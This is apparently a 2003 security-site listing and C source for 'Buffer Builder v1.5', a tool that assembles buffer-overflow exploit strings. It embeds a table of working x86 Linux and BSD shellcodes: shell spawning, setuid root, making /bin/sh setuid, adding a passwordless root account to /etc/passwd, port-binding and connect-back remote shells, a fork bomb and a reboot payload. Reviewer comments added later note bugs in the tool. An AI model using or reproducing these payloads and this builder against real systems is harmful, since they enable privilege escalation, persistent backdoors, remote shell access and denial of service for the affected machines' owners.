
Posted Dec 15, 2003
Authored by GML | Site phrick.net

Buffer Builder v1.5 is a tool which assists in building buffer overflow strings for local and remote exploits. It goes well with a disassembler and netcat, and contains several useful shellcodes.

Changes: Added the ability to change the offset, cleaned up output, added more byte-order parameters, added new shellcodes, fixed the $SHELLCODE offset calculation problem on FreeBSD, and added author strings to the shellcodes.
tags | remote, overflow, shell, local, shellcode
SHA-256 | 39c3af509337569eee964333a3439de850f8fc3714f170e17d504bf6ee4104ed


/*
* Buffer Builder (gml@phrick.net)
* EggShell Builder for *nix
* http://www.phrick.net/~gml
* gcc -o bb bb.c
*
*/

#define SHELL "/bin/sh"

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define BANNER "\n.:Buffer Builder v1.5:.\t{gml@phrick.net}"

#define R "\033[1;35m"
#define G "\033[1;34m"
#define B "\033[1;30m"
#define Y "\033[1;36m"
#define RESET "\33[0;0m"

#define NOP 0x90

// global var: argv[0], stored by main() and printed in the usage line of usage()
char *me;

// Platforms

/*
 * Supported target platforms.  `endian` is the byte-order flag consumed by
 * main(): 1 selects reverse() (little-endian address bytes), 0 selects
 * forward() (big-endian).  `pchoose` is a spare instance of the anonymous
 * struct type; sizeof(pchoose) is the element size used when the table is
 * iterated in usage() and chooseplatform().
 */
struct {
    char *plat;  // platform name as given to -p
    int endian;  // 1 = little-endian, 0 = big-endian
} plats[] = {
    { .plat = "intel", .endian = 1 },
    { .plat = "sun4u", .endian = 0 },
    { .plat = "mips",  .endian = 0 },
}, pchoose;

// Shellcodes

struct {
char *name; // name key
char *desc; // description
char *auth; // author
char *shell; // shellcode
char *plat; // platform
long base; // address base
} shells[] = {
// name = os.plat.type.author
{ "linux", "linux base","no one", "", "", 0xbffffffa },
{ "bsd", "bsd base","no one", "", "", 0xbfbffffa},
{ "linux.intel.sh.aleph", "execve() execution of /bin/sh", "aleph1","\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "intel", 0xbffffffa},
{ "linux.intel.sh.bob", "28 byte version of /bin/sh", "bob@dtors.net",
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.ash.bob", "31 byte version of execve() /bin/ash then exit()", "bob@dtors.net",
"\x31\xc0\x50\x68\x2f\x61\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel",
0xbffffffa},
{ "linux.intel.setuid.bob", "Setuid(0,0) shellcode", "bob@dtors.net",
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.rootsh.bob", "makes /bin/sh suid", "bob@dtors.net",
"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x66\xb9\xfd\x09\xb0\x0f\xcd\x80\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.passwd.bob", "Adds root account with no passwd to /etc/passwd", "bob@dtors.net", "\x31\xc0\x31\xdb\x31\xc9\x53\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\x01\x04\xb0\x05\xcd\x80\x89\xc3\x31\xc0\x31\xd2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x68\x3a\x3a\x2f\x3a\x68\x3a\x30\x3a\x30\x68\x62\x6f\x62\x3a\x89\xe1\xb2\x14\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.port.esdee", "linux portbinding shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0\x89\xf3\xb0\x06\xcd\x80\xeb\x99", "intel", 0xbffffffa},
{ "bsd.intel.port.esdee", "bsdportbinding shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80\xeb\x9a", "intel", 0xbfbffffa},
{ "linux.intel.evade.tolower", "tolower evasion and execve() execution of /bin/sh", "unknown",
"\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh", "intel", 0xbffffffa},
{ "linux.intel.evade.toupper", "toupper evasion and execve() execution of /bin/sh", "unknown",
"\xeb\x29\x5e\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa\x29\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xd2\xff\xff\xff\x0f\x42\x49\x4e\x0f\x53\x48", "intel", 0xbffffffa},
{ "linux.intel.sh.zillion", "linux shellcode", "zillion",
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68", "intel", 0xbffffffa},
{ "bsd.intel.sh.zillion", "bsd shellcode", "zillion",
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68","intel", 0xbfbffffa},
{ "linux.intel.reboot.zillion", "clean reboot shellcode", "zillion",
"\xeb\x27\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff\xff", "intel", 0xbffffffa},
{ "bsd.intel.sh.esdee", "bsd shellcode", "eSDee@netric.org",
"\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbfbffffa},
{ "linux.intel.connect.esdee", "linux Connect Back Shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "bsd.intel.connect.esdee", "bsdConnect Back Shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80\xeb\x9a", "intel", 0xbfbffffa},
{ "linux.intel.fb.gml", "fork() bomb shellcode in 6 bytes", "gml@phrick.net",
"\xb0\x02\xcd\x80\xeb\xfa", "intel", 0xbffffffa},
{ "linux.intel.write.gml", "write() shellcode 'gml'", "gml@phrick.net",
"\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.tty.sorbo", "full tty support port shell port 6666\n\t\t\thttp://www.darkircop.org/security/exploits/sorshell.c for client code\n\t\t\t", "sorbox@yahoo.com",
"\x31\xc0\xb0\x06\x50\xb0\x01\x50\x89\xc3\x40\x50\xb0\x66\x89\xe1\xcd\x80\x89\xc2\xb0\x01\x89\xe1\xb0\x04\x50\x51\xb0\x02\x50\x48\x50\x52\x89\xe1\xb0\x66\xb3\x0e\xcd\x80\x31\xdb\x53\x66\xb9\x1a\x0a\xc1\xe1\x10\xb1\x02\x51\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x52\x89\xe1\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x52\x89\xe1\xb0\x66\x43\xcd\x80\x89\xc7\x31\xd2\x52\x68\x70\x74\x6d\x78\x68\x64\x65\x76\x2f\x68\x2f\x2f\x2f\x2f\x31\xc9\xb1\x02\x89\xe3\xb0\x05\xcd\x80\x89\xc6\x52\x89\xe2\xb9\x31\x54\x04\x40\x89\xf3\xb0\x36\xcd\x80\x89\xe2\xb9\x30\x54\x04\x80\xb0\x36\xcd\x80\x59\x83\xc1\x30\xc1\xe1\x18\xba\x01\x74\x73\x2f\xc1\xea\x08\x01\xca\x31\xc9\x51\x52\x31\xd2\x68\x65\x76\x2f\x70\x68\x2f\x2f\x2f\x64\xb1\x02\x89\xe3\xb0\x05\xcd\x80\x89\xc2\xb0\x02\xcd\x80\x31\xc9\x39\xc8\x75\x40\xb0\x42\xcd\x80\xb1\x03\x31\xc0\x89\xd3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x89\xd3\xb0\x06\xcd\x80\x89\xf3\xb0\x06\xcd\x80\x89\xfb\xb0\x06\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x89\xd3\x31\xc0\xb0\x06\xcd\x80\x83\xec\x50\x31\xc0\x31\xdb\x31\xc9\x89\xf9\x43\xd3\xe3\x09\xd8\x89\xf1\x31\xdb\x43\xd3\xe3\x09\xd8\x50\x89\xda\x89\xcb\x43\x89\xe1\x52\x57\x56\x31\xff\x31\xf6\x31\xd2\xb0\x8e\xcd\x80\x5e\x5f\x5b\x58\x21\xd8\x31\xdb\x39\xc3\x75\x1b\xb2\x50\x89\xe1\x89\xfb\x31\xc0\xb0\x03\xcd\x80\x83\xf8\x01\x7c\x25\x89\xc2\x89\xf3\xb0\x04\xcd\x80\xeb\xae\xb2\x50\x89\xe1\x89\xf3\x31\xc0\xb0\x03\xcd\x80\x83\xf8\x01\x7c\x0a\x89\xc2\x89\xfb\xb0\x04\xcd\x80\xeb\x93\x31\xc0\x40\xcd\x80", "intel", 0xbffffffa},
},choose;


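/*
 * Store the low 32 bits of `ret` into `buffer` least-significant byte first
 * (little-endian), followed by a NUL so the caller can treat the result as a
 * C string.
 *
 * buffer: caller-owned storage of at least 5 bytes.  The function cannot
 *         verify this: the original `sizeof(buffer) >= 4` guard measured the
 *         pointer, not the caller's array, and so was always true on every
 *         32/64-bit target while the bytes were written unconditionally.
 *         The requirement is therefore documented here instead.
 * ret:    address value; bits above 31 are ignored.
 * Returns 0 (the "too small" return of 1 could never be reached).
 */
int reverse(char *buffer, unsigned long ret)
{
    /* Go through unsigned char so bytes >= 0x80 are stored without an
     * implementation-defined signed-char conversion. */
    unsigned char *out = (unsigned char *)buffer;

    out[0] = (unsigned char)(ret & 0xff);
    out[1] = (unsigned char)((ret >> 8) & 0xff);
    out[2] = (unsigned char)((ret >> 16) & 0xff);
    out[3] = (unsigned char)((ret >> 24) & 0xff);
    out[4] = 0;
    return 0;
}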

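/*
 * Store the low 32 bits of `ret` into `buffer` most-significant byte first
 * (big-endian), followed by a NUL so the caller can treat the result as a
 * C string.
 *
 * buffer: caller-owned storage of at least 5 bytes.  The function cannot
 *         verify this: the original `sizeof(buffer) >= 4` guard measured the
 *         pointer, not the caller's array, and so was always true on every
 *         32/64-bit target while the bytes were written unconditionally.
 *         The requirement is therefore documented here instead.
 * ret:    address value; bits above 31 are ignored.
 * Returns 0 (the "too small" return of 1 could never be reached).
 */
int forward(char *buffer, unsigned long ret)
{
    /* Go through unsigned char so bytes >= 0x80 are stored without an
     * implementation-defined signed-char conversion. */
    unsigned char *out = (unsigned char *)buffer;

    out[0] = (unsigned char)((ret >> 24) & 0xff);
    out[1] = (unsigned char)((ret >> 16) & 0xff);
    out[2] = (unsigned char)((ret >> 8) & 0xff);
    out[3] = (unsigned char)(ret & 0xff);
    out[4] = 0;
    return 0;
}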


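/*
 * Print the banner, the option summary and the platform / shellcode tables
 * to stderr, then exit(0).  Never returns.
 *
 * Reads the globals `me` (argv[0], set in main()), `plats` and `shells`;
 * `pchoose` and `choose` only supply the element size for the table-length
 * computation.  The shellcode length is strlen() of each entry, i.e. the
 * byte count up to the first NUL.
 */
void usage(void)
{
    size_t i;

    fprintf(stderr, "%s", R);
    fprintf(stderr, "%s\n", BANNER);
    fprintf(stderr, "%s", Y);
    fprintf(stderr, "usage: %s [-e <path> | -s, stdout] -n <size> -c <shellcode> -p <platform> -a [<address>|0x0] -r <repeat address> -o <offset> -v <env variable>\n\n", me);
    fprintf(stderr, ".:options:.\n");
    fprintf(stderr, "-e\t:execute program\n");
    fprintf(stderr, "-s\t:execute shell\n");
    fprintf(stderr, "-n\t:nop size\n");
    fprintf(stderr, "-c\t:shellcode\n");
    fprintf(stderr, "-p\t:platform\n");
    fprintf(stderr, "-a\t:address, 0x0 = default for shellcode\n");
    fprintf(stderr, "-r\t:repeat address #times\n");
    fprintf(stderr, "-o\t:address offset\n");
    fprintf(stderr, "-v\t:name of environment variable to use ($SHELLCODE is default)\n");
    fprintf(stderr, "\n");
    fprintf(stderr, "%s", B);
    fprintf(stderr, ".:Available Platforms:.\n");
    fprintf(stderr, "%s", G);
    for (i = 0; i < sizeof(plats) / sizeof(pchoose); i++) {
        fprintf(stderr, "%s ", plats[i].plat);
    }
    fprintf(stderr, "\n\n");
    fprintf(stderr, "%s", B);
    fprintf(stderr, ".:Available Shellcode:. \n");
    for (i = 0; i < sizeof(shells) / sizeof(choose); i++) {
        // strlen() yields size_t: %zu matches the argument type, the original
        // %d did not (undefined behaviour under -Wformat).
        fprintf(stderr, "%s[%s]\n\t%s{%zu bytes}\t{%s by %s}\n", G, shells[i].name, B, strlen(shells[i].shell), shells[i].desc, shells[i].auth);
    }
    fprintf(stderr, "%s\n", RESET);

    exit(0);
}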


/*
 * Look up a shellcode entry by its name key (the `name` field of `shells`,
 * e.g. "linux.intel.sh.aleph").  Returns the index into `shells` of the
 * first exact match, or -1 when no entry matches.
 */
int chooseshell(char *id)
{
    const size_t nshells = sizeof(shells) / sizeof(choose);

    for (size_t idx = 0; idx < nshells; idx++) {
        if (strcmp(shells[idx].name, id) != 0)
            continue;
        return (int)idx;
    }
    return -1;
}

/*
 * Map a platform name (as given to -p) to its byte-order flag from `plats`:
 * 1 for little-endian, 0 for big-endian.  Returns -1 for an unknown name.
 */
int chooseplatform(char *plat)
{
    const size_t nplats = sizeof(plats) / sizeof(pchoose);

    for (size_t k = 0; k < nplats; k++) {
        if (strcmp(plats[k].plat, plat) != 0)
            continue;
        return plats[k].endian;
    }
    return -1;
}

/*
 * Entry point.  Parses the command line with getopt(), builds the string
 *   [NOP sled][shellcode][address x times][NUL]
 * on the heap, then either writes it to stdout or stores it in a single
 * environment variable and execs a shell (-s) or a program (-e).
 *
 * Exit status is 0 on every path, including the error paths, except for an
 * unknown option (returns 1).  Several defects are noted inline below; the
 * code itself is left as published.
 */
int main(int argc, char **argv)
{

char *shell, *envvar;
char addrbuff[20000]; // -e mode: program argument, filled with repeated `ret` (see below)
char addbuff[5]; // 4 address bytes + NUL, written by reverse() / forward()
char *envbuff; // "<envvar>=<buffer>", the only entry of the exec environment
char *env[2]; // single-entry environment for execle(); nothing else is passed on
char *exec; // -e path; only read when execme is set

int shellme = 0;
int execme = 0;

int shellref = 0; // index into shells[]; 0 ("linux base", empty shellcode) unless -c is given
int opt;

// NOTE(review): `address` is assigned only in the 'a' / 'o' cases and `base`
// only in the 'c' case, yet both are read unconditionally later (reverse() /
// forward() and the `ret` computations).  Without -c / -a they are read
// uninitialised, which is undefined behaviour.
long ret, address, base, *addr_ptr;
long offset = 0;
char *ptr;

int nopsize = 0;
int endian = 1; // default little-endian; overridden by -p
int times = 1; // how many copies of the address are appended

int count = 0;

char *buffer;
int bufsize = 0;

me = argv[0];

// setup option variables
envvar = "SHELLCODE";

if((int)argc <= 1)
usage();

// parse command line arguments
// Note: the cases below depend on option order — 'p' consults the shellcode
// chosen so far, and 'o' adds to whatever `address` holds at that point.
while((opt = getopt(argc, argv, "e:sn:c:p:a:r:o:hv:")) != -1)
{
switch(opt)
{
case 'e':
execme = 1;
exec = optarg;
break;
case 's':
shellme = 1;
break;
// atoi() reports no errors: non-numeric input silently becomes 0
// (strtol() with endptr/errno checking would be the robust form).
case 'n':
nopsize = atoi(optarg);
break;
// Unknown shellcode name: message, then exit(0) — the status still
// signals success to the caller.
case 'c':
if((shellref = chooseshell(optarg)) == -1)
{
fprintf(stderr, "Invalid Shellcode Selected!!!\n");
exit(0);
}
base = shells[shellref].base;
break;
// A shellcode entry with a non-empty `plat` pins the byte order; only the
// two "base" entries (empty plat) let -p choose.  If -p precedes -c on the
// command line, shellref is still 0 here.
case 'p':
if(!strcmp(shells[shellref].plat, ""))
{
if((endian = chooseplatform(optarg)) == -1)
{
fprintf(stderr, "Invalid Platform Selected!!!\n");
exit(0);
}
}
else
{
endian = chooseplatform(shells[shellref].plat);
}
break;
// "0x0" means "use the shellcode's base"; anything else is parsed with
// strtoul(base 0), so 0x-prefixed hex and decimal are both accepted.
case 'a':
if(!strcmp(optarg, "0x0"))
{
address = base;
}
else
{
address = strtoul(optarg, 0, 0);
}
break;
case 'r':
times = atoi(optarg);
break;
// The offset is applied immediately, so it only affects `address` when -a
// was given earlier on the command line.
case 'o':
offset = atoi(optarg);
address = address + offset;
break;
case 'v':
envvar = optarg;
break;
case 'h':
usage();
break;
case '?':
if (isprint (optopt))
fprintf (stderr, "Unknown option `-%c'. -h for help.\n", optopt);
else
fprintf (stderr, "Unknown option character `\\x%x'. -h for help.\n", optopt);
return 1;
default:
usage();
}
}


// choose shell
shell = shells[shellref].shell;

// add necessary nop sled for env portion
// -s / -e ignore -n and always use a 5000-byte sled.
if(shellme || execme)
nopsize = 5000;

// calculate buffer size
// strlen() stops at the first NUL, so an entry containing a zero byte would
// be cut short here and in the memcpy() below.
bufsize = nopsize + strlen(shell);

// add to buffer size
// 4 bytes per address copy (the loop is just `times * 4`).
for(count = 1; count <= times; count++)
{
bufsize += 4;
}

// One extra byte for the terminating NUL written at the end.
// NOTE(review): the message below reads "You're" where "Your" is meant.
if(bufsize > 1)
{
bufsize++;
}
else
{
fprintf(stderr, "You're buffer is too small!!!\n");
exit(0);
}

// create buffer on the heap
// NOTE(review): malloc() result is not checked before memset() below.
buffer = (char *)malloc(bufsize);

// Fill the buffer with NOP
memset(buffer, NOP, bufsize);

// Fill buffer with shellcode
memcpy(&buffer[nopsize], shell, strlen(shell));

// Fill buffer with address
// Only in stdout mode; -s / -e leave the address portion as NOPs and pass
// the address as `ret` instead (see below).
if(!execme && !shellme)
{
if(endian)
{
// little-endian
reverse(addbuff, address);

// strlen(addbuff) counts up to the first zero byte of addbuff, so fewer
// than 4 bytes are copied when the address contains 0x00 (addbuff[4] is
// always the NUL written by reverse()).
for(count = 0; count < times; count++)
{
memcpy(&buffer[nopsize + strlen(shell) + (count *4)], addbuff, strlen(addbuff));
}

}
else
{
// big-endian
forward(addbuff, address);

// Same strlen(addbuff) caveat as in the little-endian branch.
for(count = 0; count < times; count++)
{
memcpy(&buffer[nopsize + strlen(shell) + (count *4)], addbuff, strlen(addbuff));
}
}
}

// End the buffer
buffer[bufsize - 1] = 0;

fprintf(stderr, "%s", Y);
if(shellme || execme)
{
// NOTE(review): sprintf() writes strlen(envvar) + 1 ('=') + strlen(buffer)
// + 1 (NUL) bytes, two more than allocated here — a heap overflow of
// envbuff within this program.  Allocate strlen(buffer) + strlen(envvar) + 2.
envbuff = (char *)malloc(strlen(buffer) + strlen(envvar));
sprintf(envbuff, "%s=%s", envvar, buffer);
env[0] = envbuff;
env[1] = 0;

if(shellme)
{
// `ret` is the shellcode's base minus the environment string and program
// name lengths.  NOTE(review): it is printed with %p although it is a
// long, not a pointer — a format/argument mismatch.
ret = base - strlen(envbuff) - strlen(SHELL);
fprintf(stderr, "Shellcode was loaded into: %s @ %p\n", envvar, ret);

// NOTE(review): the argv terminator is the int constant 0 passed through
// varargs; it should be (char *)NULL.  The return value is not checked,
// so a failed exec falls through to free(envbuff) and exit(0) below.
execle(SHELL, SHELL, 0, env);

}
else
{
ret = base - strlen(envbuff) - strlen(exec);

// NOTE(review): addr_ptr is `long *`, so each store writes sizeof(long)
// bytes while `count` advances by 4.  Where sizeof(long) == 8 the loop
// writes twice the size of addrbuff — a stack overflow within this
// program.  `count` (int) is also compared with a size_t here.
ptr = addrbuff;
addr_ptr = (long *) ptr;
for(count = 0; count < sizeof(addrbuff); count+=4)
{ *(addr_ptr++) = ret; }
// NOTE(review): addrbuff has no terminator of its own; strlen() relies on
// a zero byte inside the repeated `ret` values.  With none it reads past
// the array, and if the first byte is zero the index becomes -1.
addrbuff[strlen(addrbuff) -1] = 0;

// Same varargs-terminator and unchecked-return remarks as the -s branch.
execle(exec, exec,addrbuff, 0, env);

}
free(envbuff);


}
else
{
fprintf(stderr, "Shellcode to stdout...\n");
// NOTE(review): `buffer` is used as the format string (CERT FIO30-C);
// fputs(buffer, stdout) or fprintf(stdout, "%s", buffer) is the safe form.
fprintf(stdout, buffer);
}

free(buffer);

exit(0);
}